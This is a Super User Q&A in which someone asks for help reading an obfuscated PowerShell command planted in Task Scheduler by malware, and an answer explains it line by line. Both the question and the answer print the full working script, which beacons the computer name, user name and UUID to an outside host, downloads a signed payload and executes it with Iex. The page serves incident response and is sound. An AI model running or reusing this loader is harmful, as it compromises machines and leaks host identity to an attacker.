Stack Exchange Network
Stack Exchange network consists of 182 Q&A communities including
Stack Overflow
, the largest, most trusted online community for developers to learn, share their knowledge, and build their careers.
Visit Stack Exchange
Super User is a question and answer site for computer enthusiasts and power users. It only takes a minute to sign up.
Sign up to join this community
Teams
Q&A for work
Connect and share knowledge within a single location that is structured and easy to search.
Learn more about Teams
Ask Question
I have an issue with what I believe to be a virus. It is creating PowerShell scripts in TaskScheduler.
It appears to be running WMIC and powershell.
It creates a task with the following code:
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.pp6'+'r1.com';a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
It creates a randomly named file in the C:\Windows\System32\WindowsPowerShell\v1.0 (same size and creation date as powershell.exe).
I have blocked the website it is trying to get to, and I have deleted several WMIC 'autoruns' but it keeps changing the DNS entries to 8.8.8.8 and 9.9.9.9.
I am replacing the affected computer, but was wondering if anyone could assist in making the above readable so I might be able to check other machines in the network for traces.
Or if it reveals any information that might prove useful.
Thanks in advance.
–
–
The powershell script is straightforward. Contact website, download (encrypted) payload and execute payload (the Iex command).
It looks similar to Trojan.Siggen12.57410
As you can see, the script is just one of the many other things that may have been done.
Here's a quick rundown of the script
Tells powershell to execute the following block of code
function a($u)
$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);
$c=$d.count;
if($c -gt 173)
$b=$d[173..$c];
$p=New-Object Security.Cryptography.RSAParameters;
$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');
$p.Exponent=0x01,0x00,0x01;
$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
$r.ImportParameters($p);
if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171]))))
I`ex(-join[char[]]$b)
Creates a function called a that takes a URL u as parameter. From the URL it will download some data. If the data is big enough, ignore the lower part and decrypt the "payload". Check if the payload is good, then execute the payload (Iex command).
$url='http://'+'t.pp6'+'r1.com';
a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
This pieces a URL together based on some of your computer settings and calls the above defined function a with that URL.
Anyway, its likely alot more is going on than just the script you found. Check the URL i linked above, find an antivirus that will negate the threat to your standards or better yet wipe and reinstall. If the machines allow remote access, dont forget to check if any accounts were compromised.
–
